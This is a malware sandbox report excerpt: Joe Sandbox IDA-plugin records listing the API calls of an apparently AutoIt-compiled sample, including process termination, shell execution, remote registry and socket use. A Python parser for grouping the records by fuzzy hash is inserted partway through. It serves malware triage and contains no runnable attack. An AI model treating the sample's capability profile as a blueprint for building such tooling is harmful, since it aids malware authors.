                                                                                                                  • Opcode ID: e4aab82fbefefc3f4dab561770c125af3395eb559b53ff2e752644b6ae36f9e8
                                                                                                                  • Instruction ID: 194a054a97aecc800c71feae7a56330ce4755b4db32874062da265d9573039a8
                                                                                                                  • Opcode Fuzzy Hash: e4aab82fbefefc3f4dab561770c125af3395eb559b53ff2e752644b6ae36f9e8
                                                                                                                  • Instruction Fuzzy Hash: DA518071D00299DBCF64EF99C8817ADB7B2FF94314F28816AD818B7251E7309D85CBA0
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00E49B19
                                                                                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 00E49B2D
                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00E49B47
                                                                                                                  • _wcscat.LIBCMT ref: 00E49BA2
                                                                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 00E49BB9
                                                                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00E49BE7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Window_wcscat
                                                                                                                  • String ID: SysListView32
                                                                                                                  • API String ID: 307300125-78025650
                                                                                                                  • Opcode ID: 6e50a6e3d0fd8c9a651eb537108ec0e83eeffc89e354d889ba115fae1f2eeb4b
                                                                                                                  • Instruction ID: 471366894fd998d1d8d9b11ea261df1b4e295810929054aeffc625aaa75962cf
                                                                                                                  • Opcode Fuzzy Hash: 6e50a6e3d0fd8c9a651eb537108ec0e83eeffc89e354d889ba115fae1f2eeb4b
                                                                                                                  • Instruction Fuzzy Hash: 5D41A070A40308AFEB219FA4EC85BEF77A8EF48354F10542AF545F7292C6B19D84CB64
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E26532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00E26554
                                                                                                                    • Part of subcall function 00E26532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00E26564
                                                                                                                    • Part of subcall function 00E26532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00E265F9
                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E4179A
                                                                                                                  • GetLastError.KERNEL32 ref: 00E417AD
                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E417D9
                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E41855
                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 00E41860
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00E41895
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                  • API String ID: 2533919879-2896544425
                                                                                                                  • Opcode ID: 369cd971fd9aae92b8c17f29fecbe3349d400d412fbc1f71f25883f638fa1649
                                                                                                                  • Instruction ID: 4c9e139dea4e0ae3e64638961c2e1401148b0db862f82b0c74e4b91d41faea8b
                                                                                                                  • Opcode Fuzzy Hash: 369cd971fd9aae92b8c17f29fecbe3349d400d412fbc1f71f25883f638fa1649
                                                                                                                  • Instruction Fuzzy Hash: E841B171700200AFDB15EF55ED95FBE77E1AF08304F099098FA06AF2D2DBB4A9448B61
                                                                                                                  APIs
                                                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00E258B8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: IconLoad
                                                                                                                  • String ID: blank$info$question$stop$warning
                                                                                                                  • API String ID: 2457776203-404129466
                                                                                                                  • Opcode ID: 6290e3311366e59c7e5b6a062658e6e6ee4002cecb3998a3873e2e241bf8f9c8
                                                                                                                  • Instruction ID: b2f5652b3f2b32f8249b6ffa39300f9825b8fbe6ed6ccec54d1496bedd511dc5
                                                                                                                  • Opcode Fuzzy Hash: 6290e3311366e59c7e5b6a062658e6e6ee4002cecb3998a3873e2e241bf8f9c8
                                                                                                                  • Instruction Fuzzy Hash: 8911D87770D756BAEB1D5B65AD82DAA63DC9F16314F20103AF501F52C2E7F0AA404264
                                                                                                                  APIs
                                                                                                                  • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00E2A806
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ArraySafeVartype
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1725837607-0
                                                                                                                  • Opcode ID: 015a5a0df5d61fae42e37966b7aa7fb2a721afbf9356c64b29de5bea923d10fb
                                                                                                                  • Instruction ID: 4309e6a41c4ce6c9a5ed45f9c6eea4711db65ab6c0a27dc92fe83fa68ec5eba8
                                                                                                                  • Opcode Fuzzy Hash: 015a5a0df5d61fae42e37966b7aa7fb2a721afbf9356c64b29de5bea923d10fb
                                                                                                                  • Instruction Fuzzy Hash: 90C17E71A042299FDB04CF98E485BAEB7F4FF08314F28947AE616F7241D734A945CBA1
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E26B63
                                                                                                                  • LoadStringW.USER32(00000000), ref: 00E26B6A
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E26B80
                                                                                                                  • LoadStringW.USER32(00000000), ref: 00E26B87
                                                                                                                  • _wprintf.LIBCMT ref: 00E26BAD
                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E26BCB
                                                                                                                  Strings
                                                                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00E26BA8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                  • API String ID: 3648134473-3128320259
                                                                                                                  • Opcode ID: 257112ac6420f7528d8b4761552b241b98bd6a9e8a5372bd1a01136e939549a6
                                                                                                                  • Instruction ID: 5cb6c3a1d1ea1410c6ebc912eb751451bea5167178ceeadf169bfee37bc79d58
                                                                                                                  • Opcode Fuzzy Hash: 257112ac6420f7528d8b4761552b241b98bd6a9e8a5372bd1a01136e939549a6
                                                                                                                  • Instruction Fuzzy Hash: 6A0162F6904218BFEB11A7A1AD89EE7766CD708344F404491F756F2041EAB49E888B70
APIs
  • Part of subcall function 00E43C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E42BB5,?,?), ref: 00E43C1D
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E42BF6
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: BuffCharConnectRegistryUpper
• String ID:
• API String ID: 2595220575-0
• Opcode ID: f1a5e5512abf6bd80e477a9932fb6150b43e39d797f5f1b848c10e97b479d096
• Instruction ID: dcd9986b2ccd62c26bad9b9cbceac2c1a17c47538ad565add0faaf35a7ac54c7
• Opcode Fuzzy Hash: f1a5e5512abf6bd80e477a9932fb6150b43e39d797f5f1b848c10e97b479d096
• Instruction Fuzzy Hash: 5C91AA316042009FCB10EF15D891B6EB7F5FF88314F54981DFA96A72A2DB70E905CB62
APIs
• __mtinitlocknum.LIBCMT ref: 00E0A991
  • Part of subcall function 00E07D7C: __FF_MSGBANNER.LIBCMT ref: 00E07D91
  • Part of subcall function 00E07D7C: __NMSG_WRITE.LIBCMT ref: 00E07D98
  • Part of subcall function 00E07D7C: __malloc_crt.LIBCMT ref: 00E07DB8
• __lock.LIBCMT ref: 00E0A9A4
• __lock.LIBCMT ref: 00E0A9F0
• InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00E96DE0,00000018,00E15E7B,?,00000000,00000109), ref: 00E0AA0C
• RtlEnterCriticalSection.NTDLL(8000000C), ref: 00E0AA29
• RtlLeaveCriticalSection.NTDLL(8000000C), ref: 00E0AA39
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
• String ID:
• API String ID: 1422805418-0
• Opcode ID: 58927370be3092de4e96983bb6c43867ece04fe321afad6e6cea05f5ea08fbf4
• Instruction ID: 617c44da6638c1a7f3c55ea16e8ecd2704a3f863d593a0d8dddadc8d96deeece
• Opcode Fuzzy Hash: 58927370be3092de4e96983bb6c43867ece04fe321afad6e6cea05f5ea08fbf4
• Instruction Fuzzy Hash: 83411671F003099FEB149F69DA4479DB7B0AF45338F189328E425BB2E1D7749884CB91
APIs
• DeleteObject.GDI32(00000000), ref: 00E48EE4
• GetDC.USER32(00000000), ref: 00E48EEC
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E48EF7
• ReleaseDC.USER32(00000000,00000000), ref: 00E48F03
• CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00E48F3F
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00E48F50
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00E4BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00E48F8A
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00E48FAA
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
• Opcode ID: 25e6d06518e258e77f371d26f8770f9676c810f58b1eea9a4b9f998f122093fb
• Instruction ID: 91aed69e3b06471e4092994bf832639bd6deccc6785207a6c5144c16e2072685
• Opcode Fuzzy Hash: 25e6d06518e258e77f371d26f8770f9676c810f58b1eea9a4b9f998f122093fb
• Instruction Fuzzy Hash: E931BC72204214BFEB108F51EC4AFEB3BAEEF49765F044064FE09AA191CAB59845CB70
APIs
  • Part of subcall function 00DE936C: __swprintf.LIBCMT ref: 00DE93AB
  • Part of subcall function 00DE936C: __itow.LIBCMT ref: 00DE93DF
  • Part of subcall function 00DFC6F4: _wcscpy.LIBCMT ref: 00DFC717
• _wcstok.LIBCMT ref: 00E3184E
• _wcscpy.LIBCMT ref: 00E318DD
• _memset.LIBCMT ref: 00E31910
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: _wcscpy$__itow__swprintf_memset_wcstok
• String ID: X$p2
• API String ID: 774024439-3332900272
• Opcode ID: 9d8b096e0efe10bd1d312a22dd4abea6854674ee6f9f33bbec0ee504d3ea41ec
• Instruction ID: e789718ea9bd3e7f80e519427a450f7b10d48519b02f5b16fd33c288c597c7d6
• Opcode Fuzzy Hash: 9d8b096e0efe10bd1d312a22dd4abea6854674ee6f9f33bbec0ee504d3ea41ec
• Instruction Fuzzy Hash: 78C170355083809FC724EF24C895A9EBBE1FF85354F00596DF599A72A2DB30ED05CBA2
APIs
• select.WS2_32 ref: 00E39691
• WSAGetLastError.WS2_32(00000000), ref: 00E3969E
• __WSAFDIsSet.WS2_32(00000000,?), ref: 00E396C8
• WSAGetLastError.WS2_32(00000000), ref: 00E396F8
• htons.WS2_32(?), ref: 00E397AA
• inet_ntoa.WS2_32(?), ref: 00E39765
  • Part of subcall function 00E1D2FF: _strlen.LIBCMT ref: 00E1D309
• _strlen.LIBCMT ref: 00E39800
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: ErrorLast_strlen$htonsinet_ntoaselect
• String ID:
• API String ID: 3480843537-0
• Opcode ID: 28802d547be4c6a0c22b3efa4c89df019205e943036b1fee22c92386e6401db2
• Instruction ID: 9e13a590febf7ead7893e70b46c290620a48fc53061822c8fc51b90f3740ac2b
• Opcode Fuzzy Hash: 28802d547be4c6a0c22b3efa4c89df019205e943036b1fee22c92386e6401db2
• Instruction Fuzzy Hash: 0D81DF31508240AFC314EF65DC8AE6FBBE8EF85714F10461DF555AB292EBB0D904CBA2
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 28c52fe6023cb6c2358d343093f56c1737e4acdb60cb3258df0eee4b46e94b15
• Instruction ID: fb8f4dd1376ec6245f8f0354c691b448fd7bd645f340f91d4214be5a4ec9fc62
• Opcode Fuzzy Hash: 28c52fe6023cb6c2358d343093f56c1737e4acdb60cb3258df0eee4b46e94b15
• Instruction Fuzzy Hash: 63714AB1904109EFCB14CF98CC89ABEBB79FF85314F25C149FA19AA255C730AA45CB71
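The function records above are Joe Sandbox IDA-plugin output, one block per function with its direct API calls (and the calls of its subcalls), the memory dump it was lifted from, and opcode and instruction fuzzy hashes for similarity matching. A report like this one carries thousands of such blocks, most of them AutoIt runtime code, so triage usually starts by parsing them into rows and grouping on the Instruction Fuzzy Hash and the direct API set. The Python below is an added example written for this page, not Joe Sandbox tooling: the capability-tag table is the author's own assumption about what each Win32 API implies, and the sample input is a constructed excerpt of two records copied from this report with the page's "Download File" link residue left on an Associated line so the parser's handling of it is visible.

```python
"""Parse Joe Sandbox IDA-plugin function records (APIs / Memory Dump Source /
Similarity blocks) into dicts for triage. Added example, not Joe Sandbox code."""
import re
from collections import defaultdict

# One API call line: optional "Part of subcall function XXXX:" prefix, then
# Name.MODULE(args) or bare Name.MODULE, then "ref: ADDR".
API_RE = re.compile(
    r"^\s*•\s+(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s+)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Any other bullet: "• Key: value" (value may be empty, e.g. "• String ID:").
FIELD_RE = re.compile(r"^\s*•\s+(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")

# Assumed coarse capability per API name (author's mapping, not Joe Sandbox's).
CAPABILITY_TAGS = {
    "ShellExecuteExW": "process-launch", "RegConnectRegistryW": "registry",
    "select": "network", "inet_ntoa": "network", "htons": "network",
    "WSAGetLastError": "network", "__WSAFDIsSet": "network",
    "CreateFontW": "gui", "SendMessageW": "gui", "MoveWindow": "gui",
}

# Constructed excerpt: two records copied from this report, indentation removed,
# with the page's "Download File" link residue left on an Associated line.
SAMPLE = """\
APIs
  • Part of subcall function 00E43C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E42BB5,?,?), ref: 00E43C1D
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E42BF6
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: BuffCharConnectRegistryUpper
• String ID:
• API String ID: 2595220575-0
• Opcode Fuzzy Hash: f1a5e5512abf6bd80e477a9932fb6150b43e39d797f5f1b848c10e97b479d096
• Instruction Fuzzy Hash: 5C91AA316042009FCB10EF15D891B6EB7F5FF88314F54981DFA96A72A2DB70E905CB62
APIs
• select.WS2_32 ref: 00E39691
• WSAGetLastError.WS2_32(00000000), ref: 00E3969E
• __WSAFDIsSet.WS2_32(00000000,?), ref: 00E396C8
• WSAGetLastError.WS2_32(00000000), ref: 00E396F8
• htons.WS2_32(?), ref: 00E397AA
• inet_ntoa.WS2_32(?), ref: 00E39765
  • Part of subcall function 00E1D2FF: _strlen.LIBCMT ref: 00E1D309
• _strlen.LIBCMT ref: 00E39800
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
Similarity
• API ID: ErrorLast_strlen$htonsinet_ntoaselect
• String ID:
• API String ID: 3480843537-0
• Opcode Fuzzy Hash: 28802d547be4c6a0c22b3efa4c89df019205e943036b1fee22c92386e6401db2
• Instruction Fuzzy Hash: 0D81DF31508240AFC314EF65DC8AE6FBBE8EF85714F10461DF555AB292EBB0D904CBA2
"""


def _new_record():
    return {"apis": [], "associated": []}


def parse_records(text):
    """Split the listing into records; a record closes at its Instruction Fuzzy Hash."""
    records, cur = [], _new_record()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            cur["apis"].append({
                "name": m["name"], "module": m["module"],
                "args": m["args"].split(",") if m["args"] else [],
                "ref": m["ref"], "subcall_of": m["sub"],
            })
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue  # section headers such as "APIs", "Strings", "Similarity"
        key, val = m["key"], m["val"]
        if key == "Associated":
            cur["associated"].append(re.sub(r"Download File$", "", val).strip())
        elif key == "Source File":
            cur["source_file"] = val.split(",")[0]
        else:
            cur[key.lower().replace(" ", "_")] = val
        if key == "Instruction Fuzzy Hash":
            records.append(cur)
            cur = _new_record()
    if cur["apis"] or len(cur) > 2:  # truncated trailing record: keep what we have
        records.append(cur)
    return records


def capability_tags(record):
    """Capability tags from a record's direct calls (subcall lines are excluded)."""
    return sorted({CAPABILITY_TAGS[a["name"]] for a in record["apis"]
                   if a["subcall_of"] is None and a["name"] in CAPABILITY_TAGS})


def index_by_fuzzy_hash(records):
    """Group records by Instruction Fuzzy Hash. Across samples, a shared hash
    usually means the same compiled routine (here AutoIt runtime code), which
    is what you filter out before reversing the remainder."""
    idx = defaultdict(list)
    for r in records:
        if r.get("instruction_fuzzy_hash"):
            idx[r["instruction_fuzzy_hash"]].append(r)
    return idx


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec["api_id"], capability_tags(rec))
```

Run it over the whole report text (indented or not, the regexes tolerate both) and the fuzzy-hash index built from several AutoIt-compiled samples will show which records are shared runtime and which are specific to this payload; the capability tags are a quick first cut for pulling out the functions that touch the registry, the network or process creation.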
                                                                                                                  APIs
• _memset.LIBCMT ref: 00E4225A
• _memset.LIBCMT ref: 00E42323
• ShellExecuteExW.SHELL32(?), ref: 00E42368
  • Part of subcall function 00DE936C: __swprintf.LIBCMT ref: 00DE93AB
  • Part of subcall function 00DE936C: __itow.LIBCMT ref: 00DE93DF
  • Part of subcall function 00DFC6F4: _wcscpy.LIBCMT ref: 00DFC717
• CloseHandle.KERNEL32(00000000), ref: 00E4242F
• FreeLibrary.KERNEL32(00000000), ref: 00E4243E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
